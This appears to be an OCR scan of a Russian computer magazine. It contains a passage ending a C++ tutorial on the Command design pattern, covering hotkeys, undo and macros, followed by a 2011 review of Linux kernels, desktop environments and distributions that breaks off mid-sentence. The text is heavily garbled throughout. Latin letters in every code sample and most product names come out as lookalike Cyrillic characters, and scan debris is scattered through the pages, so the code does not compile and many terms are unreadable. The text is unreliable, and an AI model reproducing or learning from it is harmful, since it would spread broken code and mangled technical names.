сІаББ КипСаІсСоттапсІ : риЫіс СоттапсІ 

Саісиіаіог *са1с; 

риЫіс : 

КипСаІсСоттапсІ (Са 1с иіаіог *ехса1с) 

{ 

саіс = ехс аіс; 

} 



ѵоісі ех есиіеО 

{ 

са!с->гипСа1сО ; 

} 

ь_ 



Если внимательно присмотреться к коду команды, то можно 
заметить, что в конструкторе класса РипСаІсСоттапсІ передается 
указатель на модуль Саісиіаіог. Это сделано для большей гибкости. 
В будущем у нас может появиться класс МобегпСаІсиІаІог, вы- 
зывающий продвинутую версию расчетной программы. Используя 
композицию, то есть не фиксируя исполнителя жестко в коде, 



ІіКП* 



II. ■ ■ ■ !.І!И 

** 

ы і П 
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мы увеличиваем изолированность кода, что в будущем позволит 
сэкономить время. 

Теперь нужно связать команду с хоткеем. Для этого можно 
создать массив указателей на объекты класса Соттапб. Размер 
массива будет равен количеству поддерживаемых горячих клавиш. 
Каждый элемент массива команд сопоставляется с определенным 
хоткеем. В нашем случае для этого можно преобразовать значение 
кнопки, которая вместе с СігІ составляет какое-либо из возможных 
сочетаний, в числовое значение. Если бы мы использовали сочета- 
ния, например, от сігі-а до сігі-к, то нам бы потребовался немного 
другой подход. 

Получив код нажатого сочетания клавиш и преобразовав его 
в соответствующий индекс для массива команд, мы можем смело 
вызывать метод ехесиІеО объекта, указатель на который находится 
в нужной ячейке массива. 

Назначение команды на Иоікеу и ее запуск 

// Код инициализации команды и хоткея 

сопбі пі сотСоипІ = 10; 

Соттапб* соттапбБ [сотСоипІ] ; 



Саісиіаііог *са!с = пеш СаІсиІаіогП; 
соттапсІ5[Ѳ] = пем КипСа1сСоттапб(са1с ); 



// Код в обработчике нажатий клавиатуры 

// Получаем нажатые клавиши 

Ьоікеу = саісЬНоіКеу(); 

// Преобразовываем их в индекс и запускаем команду 
іпі іпсіех = Ьоікеу2іпбех( Ьоікеу ); 
соттапбзХіпбех] ->ехесиіе(); 

Всё довольно-таки просто. Можно определить еще несколько 
наследников Соттапб, которые будут выполнять определенные 
действия, и связать их с горячими клавишами. Такая архитектура 
позволяет полностью отделить клиент от исполнителей. Обработ- 
чик клавиатуры понятия не имеет, какой модуль обрабатывает ко- 
манду и что именно он делает, а модули, в свою очередь, не подо- 
зревают, что обращение к ним осуществляется с помощью Ьоікеуз, 
а не каким-то другим способом. 

ОТМЕНА КОМАНДЫ 

Вроде бы всё хорошо, но мы совсем забыли про отмену. Сочетание 
клавиш сігі -2 должно откатывать действие последней команды. 
Реализовать отмену довольно просто, хотя на первый взгляд может 
показаться, что это совсем не так. Для этого мы немного изменим 
интерфейс Соттапб. 

Класс Соттапб, поддерживающий отмену 

сіавз Сотшапб 

Ь_ 

риЬІіс : 



ѵоіб ехесиіеО = Ѳ; 
ѵоіб ипбоР = 0; 

ь_ 



сІаББ КипСаІсСоттапб : риЬІіс С отшапб 



Саісиіаііог *са!с; 



риЬІіс : 

КипСаІсСоттапб (Саісиіаіоп *ехса1с) 

{ 

саіс = ехсаіс; 

} 



ѵоіб ехесиіеП 



{ 

са!с->гипСа1сО ; 

} 



ѵоіб ипбо() 

{ 

са1с->с1овеСа1с(Х; 

} 

Мы просто добавили метод ипбо(), который должен быть 
переопределен в классах-наследниках. Программист сам решает, 
какую именно функцию модуля будет использовать метод отмены. 
Так, метод ипбо(] для РипСаІсСоттапб будет обращаться к функ- 
ции сІозеСаІсО модуля Саісиіаіог. Нам также потребуется немного 
подправить код обработчика клавиатуры. 

Обработчик клавиатуры с поддержкой отмены 

// Код инициализации команды и хоткея 

сопбі і г сотСоипІ = 10; 

Соттапб* соттапбз [сотСоипІ] ; 

Соттапб *1а5ІСоттапб = пеы ІМоСоттапбП; 



Саісиіаіог *са!с = пеш Са1си1аіог( ) ; 

соттапбз[01 = пеы К ипСаІсСоттапбГсаІс’) : 



// Код в обработчике нажатий клавиатуры 
// Получаем нажатые клавиши 
НоіКеѵ *Ьоікеѵ = саісЬНоіКеѵП ; 



// Если это отмена, то вызываем соответствующий метод 
іі ( Ьоікеѵ->5ігП == "сігі-і") 



1а5іСоттапб->ипбо( ) ; 

} 



// О б работка осталь н ых сочетай и й 

Здесь мы просто запоминаем в переменной ІазіСоттапб 
указатель на последнюю использованную команду и при нажатии 
сІгІ-2 вызываем соответствующий метод. Дополнительно мы при- 
бегаем к небольшому трюку, используя объект пустой команды 
ЫоСоттапб. Код этого класса выглядиттак: 

Пустая команда ІМоСоттапсІ 

сІазБ ІМоСотта пб : риЬІіс Сотт апб 

риЬІіс : 
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ѵоісі ехесиіе() {}; 
ѵоісі ипсІо() {}; 

Ь_ 



Такие объекты-заглушки используются довольно часто. Они 
нужны, чтобы уменьшить количество проверок нулевого указателя, 
Если бы ІаБІСоттапб был равен І\ЛЛ_І_, то перед вызовом метода 
ипбоО нам пришлось бы проверять корректность значения этого 
указателя, что нежелательно, так как однажды мы можем забыть 
это сделать, в результате чего программа с грохотом упадет. Такие 
же объекты-заглушки рекомендуется использовать и для осталь- 
ных хоткеев, которым не назначены соответствующие команды. 

Кстати, код обработчика клавиатуры можно модифицировать 
так, чтобы он поддерживал отмену не только последней операции, 
но и вообще всех цепочек выполненных команд. Для этого вместо 
простого указателя на последнюю команду следует использовать 
стек. При обработке какого-либо хоткея в стек будет добавляться 
указатель на соответствующую команду. Таким образом, мы полу- 
чим полную историю вызовов команд, что позволит нам последо- 
вательно все отменить при помощи сігі -г. 

МАКРОКОМАНДЫ 

Макросы — одно из величайших изобретений человечества, по- 
могающее ему экономить тонны времени. Наш паттерн позволяет 
реализовывать макрокоманды всего лишь с помощью нескольких 
дополнительных строк кода. Для начала определим класс, отве- 
чающий за логику группового выполнения операций. 

Макрокоманда 

с Іа б 5 МасгоСоттапсІ : риЬІіс С оттапсі 



СоттапсІ *соттапб5; 
іп1= сотСоипІ:; 

риЫіс: 



МасгоСоттапсІ (Соттапсі *сотАггаѵ. іпі еІетСоипі:) 



соттапбБ = сотАггау; 
сотСоипІ = еІетСоипі; 



ѵоісі ехесиіеП 

{ 



-Рог (іпі і = 0; і < сотСоипІ:; і++) 



соттапсІ5[і] ->ехеси1:еО : 

} 

} 



ѵоісі и псІоО 

{ 

-Рог (іпі і = 0; і < сотСоипІ; і++) 

—С 



соттапсі б_[_і ] - >ипсІ°( ) ; 

і 

і 



Как видно, класс МасгоСоттапсІ является наследником 
Соттапсі и переопределяет всё те же методы ехесиіе и ипбо. В ин- 
терфейсе от обычной команды он отличается лишь конструктором. 
Этот класс принимает не указатель на исполняющий модуль, а мас- 
сив указателей на простые команды. Код ехесиІеП просто проходит 
по элементам массива и вызывает каждый из них. Также ведет 




себя и ипбоО. Обработчик клавиатуры при обращении к объекту 
команды понятия не имеет, макрос это или обычная единичная 
операция, — главное, что все они предоставляют функции ехесиЫ) 
и ипбоО. 



РАСШИРЕННЫЕ ВОЗМОЖНОСТИ 
ПАТТЕРНА «КОМАНДА» 

Наш паттерн можно использовать не только для обработки горячих 
сочетаний клавиш. С помощью него можно организовывать очере- 
ди запросов. Допустим, что у нас есть пул потоков, который должен 
выполнять некоторые задания. Все задания представляют собой 
объекты, реализующие уже знакомый нам интерфейс Соттапб. 
Команды выстраиваются в очередь, к которой последовательно 
обращаются потоки. Они забирают команды из этой очереди и за- 
пускают их методы ехесиЫ). Потокам не важно, что делают эти 
объекты — главное, чтобы они поддерживали вызов ехесиіеі). 

Команды можно сохранять на жестком диске и восстанавли- 
вать их оттуда. Для этого следует немного расширить их базовый 
интерфейс. 

Соттапб с поддержкой сохранения и загрузки 

сІазБ Соттапб 

риЬІіс : 

ѵоіб ехесиіе() = 0; 
ѵоіб ипбоО = Ѳ; 
ѵоіб ІоабО = Ѳ; 

5іоге() = 0; 

} 



Метод ІоабО предназначен для сохранения команды в журнале, 
а БІогеО — для ее восстановления оттуда. Код этих методов может 
использовать механизмы сериализации языка программирования, 
если таковые в нем есть. Такая функциональность нужна для рабо- 
ты с большими объемами данных, которые невозможно сохранять 
после совершения с ними каждого действия. При сбое программы 
мы сможем загрузить сохраненные команды и последовательно 
применить их к имеющейся копии данных для приведения этих 
данных в актуальное состояние. 

ЗАКЛЮЧЕНИЕ 

С помощью паттерна «Команда» нам удалось полностью отделить 
разношерстные модули-исполнители от клиента — обработчика 
клавиатуры. Если в будущем в программе появятся новые модули, 
мы сможем легко добавить соответствующие команды и назначить 
им горячие клавиши. Это будет простое, изящное и эффективное 
решение. ПИ 
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5011 КС Е 
И ПРОГНОЗЫ 
НА БУДУЩЕЕ 



кетеІпеѵѵЬіеБ. 

ога/ЫпихСНапаез 

— подробный 
сііапдеіод всех 
версий Ыпих. 



Вариант логотипа 
Ыпих 3.1. Жаль, 
не приняли 



Для мира ореп зоигсе 2011 год 
стал годом патентов и взломов. 

С одной стороны, МісгозоО: и Огасіе 
затаскали крупные компании по судам 
за нарушения каких-то спорных 
патентов, с другой стороны, ресурсы 
мажорных опенсорсных проектов один 
за другим подверглись взлому: аррсІЬ. 
ѵѵіпеЬр.огд, ѵѵікі.рЬр.пеІ:, тузді.сопп, 
зоигсеЬгде.пеІ:, кегпеі.огд и Ііпих.сот. 







Победы и поражения ореп зоигсе — 2011 



иімііх 



Пальму первенства в списке самых попу- 
лярных опенсорсных проектов из года в год 
удерживает І_іпих. Думаю, не сильно ошибусь, 
если предположу, что он установлен более 
чем на полумиллиарде устройств. Главным со- 
бытием в области разработки ядра в 2011 году 
стала смена нумерации. Вместо версии, кото- 
рая должна была выйти под номером 2.6.40, 
в середине прошлого года вышла версия 
3.0. Никаких особых новшеств (кроме вроде 
как официального ухода от Від КегпеІ І_оск), 
которые могли бы оправдать смену нумерации, 
не было, просто Линусу показалось, что сорок 
релизов ветки 2.6 — это слишком много и пора 
что-то менять. Теперь первая цифра в номере 
релиза будет меняться не только в случае по- 
явления радикальных нововведений (часто ло- 
мающих обратную совместимость), но и через 
каждые сорок релизов (при текущей скорости 
разработки цифра в очередной раз сменится 
примерно через десять лет). 

В прошлом году зарелизились версии 2.6.37- 
2.6.39 и 3.0-3.1. В любом релизе основная 
часть (если мерить в строчках кода) изме- 
нений касается добавления или улучшения 
драйверов для тех или иных устройств. Все 
изменения перечислять не имеет смысла, 
поэтому приведу те из них, которые заслужи- 
вают внимания: 

• Новый драйвердля Іпіеі 5МА500 (когда-то 
довольно широко использовался в нетбу- 
ках вместе с Іпіеі Аіот 2-серии). Раньше 
нормальный драйвер было сложно сделать 
из-за лицензионных соглашений: в отли- 
чие отжелезок, которые Іпіеі разработала 

с нуля, Іпіеі ЗМА500, по сути, представля- 
ет собой РоѵѵегѴР 5СХ535 отітадіпаііоп 
ТесЬпоІодіез. Сейчас драйвер всё равно 
оставляетжелать лучшего, но его потихонь- 
ку пилят. 

• Поддержка секторов размером более 512 
байт в ІіЬаіа (например, 4 Кб, как во многих 
современных винтах). 

• Поддержка видеокарте интерфейсом 115В 

и ІІ5В2Ѵ6А-переходников (для подключения 
моников через 115В). 

• Поддержка новых процессорныхархитек- 
тур: ІІпіСоге-32 (разработан и достаточно 
активно используется в Китае), 64-ЬііТіІега 
(процессоры соченьбольшим количеством 
ядер — до 100 штук, — довольно часто встре- 
чающиеся в роутерах, файерволах, базовых 
станциях высокоскоростныхсетей сотовой 




6Ы0МЕ3.2 в Ресіога 16 




Добро пожаловать в ОеЬіап 6 



связи) и Ореп РІ5С (открытый процессор 
с производительностью примерно на уровне 
АРМ10). 

• Поддержкатехнологии ЫРС (Ыеаг РіеИ 
Соттипісаііоп), служащей для обмена 
данными на очень небольшом расстоянии 
(около 10 см). Основная сфера применения 
на сегодняшний день — различные системы 
электронных платежей (например, втойже 
ОоодІеѴѴаІІеі). 

• Многочисленныеулучшения, касающиеся 
работы на 55й (в частности, в бт-сгурі 

и ех*4). 

• Поддержка таких специфических устройств, 
как М іеговой Кіпесі и ІМіпІепсІо ѴѴіі Ретоіе. 

• Существенные изменения в йРМ-модулях 
Юігесі Репбегіпд Мападег, не путать 

с Оідііаі гідЫв тападетепі) отіпіеі, Рабеоп 
и ІМоиѵеаи. Для всех чипов Іпіеі увеличена 
производительность (особен но для послед- 
него поколения — 5апсІу Вгісіде) и уменьше- 
но потребление энергии. Также добавлена 
поддержка еще не выпущенных процессо- 
ровсемейства Іѵу Вгісіде и всех последних 
видеокарт Рабеоп и ІМоиѵеаи. Проведена 
оптимизация для различных чипов: так, 
в некоторыхтестах ІѴІѴЮІАудалось добиться 
двукратного роста производительности. 

Ни один релиз не обошелся без существенных 

изменений в подсистеме виртуализации: 

• В КѴМтеперьможнозапускатьвиртуальные 
машины на виртуальной машине (вложенная 
виртуализация). 

• ПоддержкаХеп йотО (хост-режим) наконец- 
то появилась и в ванильном ядре. И это очень 
радует, так как разработчики некоторых 
дистрибутивов (в частности, ОеЬіап) со- 
бирались уже отказаться от поддержи Хеп. 
Крометого, добавлены патчи для изменения 
количества ОЗУ гостевыхсистем налет» 

и проброса (раззіЬгоидЫустройств РСІ 
в гостевыесистемы. 

• В механизмесдгоирз(который использу- 



ется, например, І_ХС — системой виртуали- 
зации уровня ОС) появилась возможность 
выставлять лимиты на запись или чтение 
данных (в байтах в секунду или І0Р5'ах). 

• Серьезно оптимизированы виртуа лизи- 
рованные окружения (особенно сетевые 
подсистемы). 

Крупных изменений, которым подверглись 

файловые системы, насчитывается не много: 

• Многообещающая ВігГз научилась прозрач- 
но сжимать да иные на дисках по алгоритму 
120. Тесты показывают его существенное 
превосходство над прежним методом 

2ІІЬ, а для некоторых операций и над тем и 
методами, которые вообще не используют 
компрессию. 

• Также в ВМз добавиласьавтоматическая 
дефрагментация (опция монтирования «-о 
аиіосіеітад»). 

• В5диазЬР5, которая широко используется 
на ЫѵеСО, добавлена поддержка форматахъ 
для сжатия данных. 

В сетевой подсистеме появились следующие 

фичи: 

• Ассеі-ррір — реализация РРТР/РРРоЕ/ 
І_2ТР-сервера и РРТР-клиента, работающих 
на уровне ядра. По разным данным, они по- 
вышают производительность минимум в два 
раза по сравнению с решениями, работаю- 
щими в ивег-зрасе. Кстати, разработчик — 
наш соотечественник. 

• Протокол маршрутизации В.А.Т.М.А.ІМ. 
(Вейег АрргоасЬТо МоЬМе АЬЬос 
Ыеіѵѵогкіпд), предназначенный для тезЬ- 
сетей (сети, где каждый хостсвязан с сетью 
через соседниехосты). 

• Новая реализация кода поддержки І5С5І 
Іагдеі. 

• Возможность монтировать 0Р5-ресурсы 
(ОівІгіЬиІесІ РіІеВузІет) ѴѴіпсІоѵѵз 2008. 

• Возможность привязывать к сетевому и н- 
терфейсувсеадреса произвольной подсети. 
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ТОРЮ дистрибутивов по версии ОізІгоѵѵаІсЬ 



• В состав ядра включен ірзеі — компонент 
пеШКег, предназначенный для обработки 
большихсписков ІР/МАС-адресов иТСР/ 
ІЮР-портов. 

• Функция ѴѴаке оп ѴѴІ_АІ\І для беспроводного 
адаптера. 

Для обычных десктопов тоже появилась пара 
важных нововведений: 

• С целью повышения интерактивности 
планировщикзадач получил возможность 
оперировать группами процессов (а не от- 
дельными процессами), которые объеди- 
нены повеззіоп Ю. Таким образом, теперь 
запускбольшого количества потоков таке 
не повеситбраузер. Чтобы включитьэту 
функцию, следуетзаписать«1» в/ргос/зуз/ 
кегпеІ/зсЬеб_аііІодгоир_епаЫесІ. 

• Добавлены специальныетаймеры, по- 
зволяющие выводить ОС из спящего режима 
взаданное время. 

Параллельно с ванильным ядром обновля- 
ются также патчи, которые пока в него не вхо- 
дят. В ветке «-гі» (РеаШте) ветке, которая 
превращает Ыпих в ОС реального времени, 
появились патчи для Ыпих 3.0 (предыдущие 
патчи базировались на версии 2.6.33). Сильно 
доработанные новые патчи затрагивают почти 
в два раза меньше файлов, что позволяет 
надеяться на скорое слияние веток. Для по- 
следнего стабильного Ыпих 3.1 также вышел 
патч р^-кегпеі, который не только включает 
в себя обычный планировщик процессов ВРБ, 
планировщик ввода-вывода БРО и систему 
гибернации ТихОпІсе, но и снижает энергопо- 
требление до уровня Ыпих 2.6.37 (о чем много 
писали на рЬогопіх.сот ). В соответствии 
с принципом Реіеазе еагіу, геіеазе ойеп новые 
версии Ыпих выходят в среднем четыре раза 
в год. Это нравится конечным пользователям, 
но не устраивает компании, производящие 
устройства под управлением Ыпих, поэтому 
Ыпих Роипсіаііоп в 2011 году запустила про- 
грамму І_опд Тегт Сиррогі I піТіаТіѵе (І_ТСІ). Эта 
программа предусматривает выпуск обновле- 



ний безопасности и фиксов ошибок (а также, 
возможно, бэкпортирование некоторых фич). 



0Е5КТ0Р ЕМѴІРОЫМЕМТ 



Вообще, цифра три была довольно популярна 
в прошлом году среди мажорных релизов. Так, 
с задержкой примерно на год вышел Споте 3.0. 
Основное нововведение — интерфейс, карди- 
нально отличающийся от интерфейса Споте 
2. Далеко не все пользователи приняли его 
с восторгом (например, Торвальдс сказал, что 
СпотеЗ невозможно использовать, и он подо- 
ждет на ХРСЕ, пока появится форк Споте2). 
Помимо нового интерфейса, появились сле- 
дующие фичи: 

• Переделано единое окно Сопігоі Сепіегдля 
настройки всех параметров системы. 

• В ЕтраіЬу появилась функция блокировки 
спама, Еѵіпсе обзавелся возможностью 
создавать за кладки, Еуе о{ СІЧОМЕ теперь 
поддерживает плагины. 

В версии Споте 3.2 разработчики попытались 
исправить некоторые недочеты и добавили 
новые фичи: 

• Тесная интеграция с различными ѵѵеЬ- 
сервисами: в календаре поддерживается 
Соодіе Саіепбаг, а в программе для работы 
с документами — Соодіе йосз. 

• Системауправления цветовыми профилями 
и виртуальная клавиатура. 

• Оптимизация для использования на план- 
шетах. 

• Поддержка СІР в ЕтраіЬу. 

• Поддержка Арріе Ріііпд Ргоіосоі для доступа 
к файлам на ОС от Арріе. 

У СпотеЗ есть один несомненный плюс — 



простота кастомизации внешнего вида с по- 
мощью плагинов, написанных на ЭаѵаСсгірІ 
и ССС. На сайте ехіепзіопз.дпоте.огд 

можно найти и установить прямо из браузера 
(правда, пока поддерживается только Рігеіюх 
со специальным плагином) большое количе- 
ство дополнений. 

После выхода СпотеЗ поддержка Споте2 
прекратилась, но нашлись энтузиасты, которые 
собираются развивать форк старого Споте под 
названием Маіе йезкіор Епѵігоптепі (МОЕ). 

КОЕ (которой в прошлом году, кстати, ис- 
полнилось 15 лет) свою революцию уже 
пережила. В ближайшем будущем новая пока 
не планируется, разработчики просто по- 
тихоньку пилят четвертую ветку. Вышло две 
версии — 4.6 и 4.7. Самые интересные фичи, 
которые в них появились: 

• Поддержка ОрепСЬ ЕС 2.0 в Кѵѵіп, что 
позволяет запускать КйЕ на мобильных 
устройствах. Код самого Кѵѵіп был местами 
серьезно оптимизирован. 

• ПроектРІазта Асііѵе — интерфейс, пред- 
назначенный для устройств с сенсорными 
экранами. 

• Развитие механизма комнат (Асііѵіііез), в ре- 
зультате которого у прости л ось добавление 
файла или приложения в определенную 
АсііѵіТу (с помощью контекстного меню ря- 
дом с заголовком окна) и появилась возмож- 
ность запускать определенные приложения 
при переключении на Асііѵііу. 

• Новые плагины (для работы с СОЕ и для 
взаимодействия с СРВ) для текстового 
редактора Каіе. 

• Из бѵѵепѵіеѵѵи КзпарзЬоІ теперь можно 
легко выгрузить изображения во внешние 
сервисы. 
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• Отказ отиспользования НАІ_. 

• Поддержка 2еіІдеізІ (механизм для отсле- 
живания активности пользователя). 

• Существенноускорена работа ІМеротик. 

• Интеграция ѴРЫ и ЫеІѵѵогкМападег 0.9 
с поддержкой 30. 

• Перевод всех компонентов КопІасі5иіІе 
на Акопабі. 

• КйМ теперь умеет взаимодействовать 
сОгиЬ, чтопозволяетперезагрузиться влю- 
бой пункт ОгиЬ прямо из КОМ. 

• Поддержка РуіЬоп в Кбеѵеіор. 

• Функция распознавания лиц в каталогиза- 
торе фотографий бідіКат (кпримеру, для 
автоматической расстановки тегов). 

Тем не менее, как бы ни был хорош КйЕ4, 
довольно много поклонников еще осталось 
у КйЕЗ, точнее, уже у его форка Тгіпііу, который 
вполне нормально развивается, потихоньку 
переползая на 014. 

Также обновились многие связанные с КОЕ 
проекты: 

• Вышел оѵѵпСІоиб 2 — свободный аналог 
йгорЬох, написанный на 1_АМР и позволяю- 
щий установить серверную часть на своем 
хосте. 

• ІМесеззіІаз (порт 01 на Апбгоіб) обновлялся 
несколько раз за год, однако пока остается 
в статусе аірба. 



ДИСТРИБУТИВЫ 



Каждый год количество дистрибутивов Ыпих 
неуклонно растет: появляются новые, обнов- 
ляются старые. 

Так, в начале 2011 года один из самых старых 
и уважаемых дистрибутивов, ОеЫап, порадо- 
вал нас новым релизом под номером 6 (кодо- 
вое имя Бяиееге). Основные нововведения: 

• Использование 0гиЬ2 поумолчанию. 

• Параллельный за пуск (с учетом зависимо- 
стей) іпіі-скриптов при старте. 

• Прекращена поддержка звуковой подсисте- 
мы 055. 

• Улучшена поддержка ІРѵб. 

• йркд научился понимать формат архивов Х2, 
стал быстрее и больше не нуждается в РегІ 
для работы. 

• Количество пакетов в репозиториях пре- 
высило 29 тысяч. Согласно приведенной 
разработчиками статистике, около 63 % всех 
Ыпих-дистрибутивов основано на пакетной 
базе ОеЫап. 

• Новые версии всего подряд — Ыпих 2.6.32 

(из которого убраны все несвободные прошив- 
ки), ѲСС 4.4.5, Хеп 4.0.1, Х.Огд 7.5, К0Е5С4.4.5, 
0ІМОМ Е 2.30, Хісе 4.6, ОрепСЖісе.огд 3.2.1. 

• Интеграция СопзоІеКМ: (управление сессия- 
ми) и Роіісу КМ: (предоставление расширен- 
ных прав доступа). 

• Полная поддержка 0ІМ55ЕС. 

• 150-образы инсталляторовтеперь гибрид- 
ные, благодаря чему их можно записать 

на флешку с помощью простого сИ. 

• йеЬіап 0І\ІІІ/кРгееВ5О — версия на ядре 
РгееВ50. Доступны 32- и 64-разрядные 
сборки. 




Ыпих Міпі 12 



• Сайт. і, на котором можно найти 

пакеты с новыми версиями ПО для старых 
релизов, признан официальным сервисом 

и переехал на ЬаскрогІз.сІеЬіап.ога . 

Новые версии ОеЫап появляются редко, 
поэтому выход каждой превращается в боль- 
шое событие (шутка ли — через 18 лет соз- 
дания дистрибутива вышла только версия 
под номером 6). В честь этого был обновлен 
дизайн (который не менялся 13 лет) всех 
официальных сайтов, начиная с беЬіап.огд . 

В прошлом году периодически поднимал- 
ся вопрос о создании гоіііпд геіеазе ветки 
ОеЫап (бесконечно обновляемого на манер 
0еп1оо или АгсЬ Ыпих). В результате появил- 
ся проект ОеЫап СІІТ (Сопзіапііу ІІзаЫе 
Тезііпд) с ежемесячными срезами тестового 
репозитория, но статус проекта пока еще 
не понятен. 

Самый известный последователь ОеЫап, 
ІІЬипІи, строго по графику обзавелся двумя 
новыми релизами: 11.04 ЖаМу МагѵѵЬаІ) 
и 11.10 (Опеігіс Осеіоі). Основные усилия раз- 
работчиков были сосредоточены на следую- 
щих нововведениях: 

• Ііпііу (собственная надстройка надбпотеЗ) 
стала ОЕ поумолчанию не только для нетбу- 
ков, но и для десктопов. 

• В менеджере приложений 5оЙѵѵаге Сепіег 
появились рейтинги и отзывы, а также 
возможность протестировать приложение 
передустановкой (правда, пока поддер- 
живаются далеко не все приложения, а для 
тестирования необходим пакетдіпх). Теперь 
можно синхронизировать сп иски установ- 
ленных приложений между компьютерами. 
Количество платных приложений медленно, 
но верно растет. Кроме того, добавились 
книги ижурналы. 

• Объем бесплатного дискового простран- 
ства в«облачном»хранилище ІІЬипІи Опе 
увеличен с 2 до 5 Гб (за $2,99 в месяц или 
$29,99 в год можно получить дополнитель- 
ные 20 Гб). Кстати, в середине прошлого 
года сервис перешагнул рубеж в миллион 
пользователей. Также вышел официальный 
клиентдля АпбгоісІ, который, правда, умеет 



пока только синхронизировать файлы и ав- 
томатически добавлять в III фото с камеры. 

Кроме того, произошли существенные пере- 
становки в приложениях по умолчанию: 
иЬгеОІТісе пришел на смену ОрепОІТісе, 
медиапроигрыватель ВапзЬее заменил 
РЬуіЬтЬох, место Еѵоіиііоп занял ТГі и псІегЬігсІ, 
дисплейный менеджер ЫдЬЮМ вытеснил 
ВйМ, удалены 5упарІіс и РіТІѴі, добавлена 
удобная утилита Ое)а йир для резервного 
копирования. Кроме обычного ЫѵеСО (кото- 
рый, кстати, теперь гибридный), появилась 
ОѴО-версия с расширенной локализацией, 
полной версией ЫЬгеОІТісе, Іпкзсаре, 01МР 
и Ріііѵі. В семейство ІІЬипІи официально во- 
шла ЬиЬипІи с 1_Х0Е. 

Чтобы обосноваться на рынке серверов, 
СапопісаІ затратила немало сил на разработку 
следующих новшеств: 

• ІІЬипІи АРМ 5егѵег ЕсШіоп — специальная 
версия для серверов на АРМ (сейчасэто 
модный тренд, хотя успешных коммерческих 
реализаций пока невидно). 

• «Облачная» платформа 0реп5іаск для за- 
мены Еисаіуріиз. 

• Проекты ОгсЬезІга (коллекцияуправляю- 
щих сервисов серверной инфраструктуры, 
которые быстро и просто разворачиваются) 
ѵ\1и]и (отвечает за запуск определенных 
сервисовдля пользователей). 

Самое спорное нововведение в ІІЬипІи 
за прошедший год, Ііпііу, не могло не снизить 
популярность дистрибутива — по крайней 
мере, на сІізІгоѵѵаІсЬ.сот ІІЬипІи опустилась 
на второе место в рейтинге. Первое место 
с большим отрывом занял Ыпих Міпі (осно- 
ванный на ІІЬипІи), который также обза- 
велся двумя релизами в прошлом году — 11 
(кодовое имя Каіуа, основан на ІІЬипІи 11.04) 
и 12 (І_іза на базе ІІЬипІи 11.10). Міпі стара- 
ется не отпугивать пользователей непри- 
вычным интерфейсом, поэтому даже 0поте 
5ЬеІІ в последней версии похож на 0поте2. 
Ктомуже версия поддерживает Маіе йезкіор 
Епѵігоптепі — форк 0поте2. 

Перед тем как начинать разработку сле- 
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ІЖІХОІО 



дующего релиза, СапопісаІ проводит встречу 
разработчиков — ІІЬипШ йеѵеіорег 5иттіІ, 
благодаря которой мы можем узнать, чего 
ждать от последующих версий дистрибутива. 

В версии 12.04 ИЗ (І_опд Тепл Зиррогі) нам 
обещают: 

• Увеличитьсрокподдержки сіезкіор-версии 
до пяти лет, а кроме того, в течение первых 
двух лет бэкпортировать в ядро дрова для 
новых железок (по-моему, очень хорошая 
идея]. 

• Рекомендоватьиспользование поумолча- 
нию 64-разрядной версии. 

• Увеличитьобъем ЫѵеСО до 750 Мб. 

• Вернуть РЬуШтЬох на место ВапзЬее и за- 
мен итьТотЬоу на Опоіе, чтобы удалитьМопо 
с ЫѵеСО. 

• Доработать II пііу для улучшения работы 
на несколькихмониторах. 

• Оптимизировать КѴМ дляулучшения работы 
на АРМ, добавить поддержку протокола 
5РІСЕ, разработанного для связи с вирту- 
альными машинами. 

• Включить в стандартную поставку какое- 
нибудь приложение- календарь (возможно, 
это будет ЫдЫпіпд — плагин кТЬипсіегЬігсІ). 

В 2011 году также вышли две версии само- 
го известного РРМ-дистрибутива, Ресіога: 15 
(І_оѵеІоск) и 16 (Ѵегпе). 

Основные новшества: 

• Обновлениезагрузчика до 6РІІВ2. 

• Замена 6поте2 на ОпотеЗ. 

• Поддержка динамического межсетевого 
экрана Л геѵѵаіісі, позволяющего менять 
отдельные правила без перезагрузки всей 
таблицы. 

• Поддержка протокола 5РІСЕ в ѴИ Мападег. 

• Изменения в названиях сетевых и нтерфей- 
сов: теперь имя зависит оттипа сетевой 
карты и имеетвид р<5ІоІ_питЬег>р<рогІ_ 
питЬег>для РСІ или ет<рогІ_питЬег>для 



интегрированной карты. 

• Постепенный отход от использования зеіиісі 
в приложениях. 

• Диспетчер служб и сеансов зузіетсі. 

• III й и СЮ нового пользователя теперь на- 
чинаются с 1000 для обеспечения совмести- 
мости с други ми дистрибутивами и расшире- 
ния диапазона ІІЮ/6Ю для сервисов. 

Несмотря на опасения, вызванные прода- 
жей компании ІМоѵеІІ, на разработке орепБІІБЕ 
этот факт пока не сказался — в 2011 году было 
выпущено два релиза: 11.4 и 12.1. К значимым 
изменениям относятся переход на іпіЫдемон 
зузіетсі, внедрение инструмента Зпаррег для 
управления снапшотами Ыг^з и «облачного» 
хранилища оѵѵпСІоиб. 

В50-системы в ушедшем году не отличи- 
лись большим количеством релизов. В вось- 
мой ветке РгееВЗО улучшен Хеп, реализована 
новая версия 2Р5 с поддержкой дедуплика- 
ции (механизм для экономии места на диске 
за счет поиска дубликатов блоков), ускорено 
шифрование/дешифрование АЕ5 благодаря 
использованию специального набора инструк- 
ций АЕБ- N I в современных процессорах. 
СИапдеІод РгееВБй 9 значительно интереснее: 

• В базовую систему добавлен компилятор 
СІапд, который может практически полно- 
стьюзаменитьОСС. 

• Системауправления РАЮ-массивами 
аіагаісі заменена на дгаіб, основанную 
наОЕОМ. 

• В качестве инсталлятора поумолчанию 
теперь используется ВВОІпзІаІІ. 

• Добавлен инструмент РСТІ_, позволяющий 
ограничиватьресурсы (СРІІ, тетогу и дру- 
гие) для процессов, пользователей или баіі. 

• Появиласьподдержкатехнологии Сарзісит 
для помещения процессов (в том числе 
разных процессов одного приложения) 

в изолированныеокружения. 



• Добавлен новый ІІ5В-драйвер с поддержкой 
115В 3.0. 

Также большим событием для РгееВЗО 
стало появление нового гипервизора ВНуѴе. 
ОрепВЗй пережил два релиза: 4.9 и 5.0 (не ма- 
жорный, несмотря на нумерацию). В число 
основных изменений входят поддержка АЕ5- 
N1, поддержка больше 4 Гб ОЗУ и больше 64 
процессорных ядер, ѴѴаке оп І_АІ\І, устранение 
некоторых потенциальных проблем с безопас- 
ностью. 

Как бы ни хотелось рассказать про много- 
численные успехи І_іпих на рынке мобильных 
устройств (телефонов и планшетов), рассказ, 
увы, получится коротким. Единственный пред- 
ставитель семейства І_іпих — АпбгоісІ (к концу 
прошлого года количество устройств под его 
управлением превысило 200 миллионов), 
который с некоторой натяжкой можно считать 
открытым, может похвастать двумя мажорны- 
ми релизами, выпущенными в 2011 году: вер- 
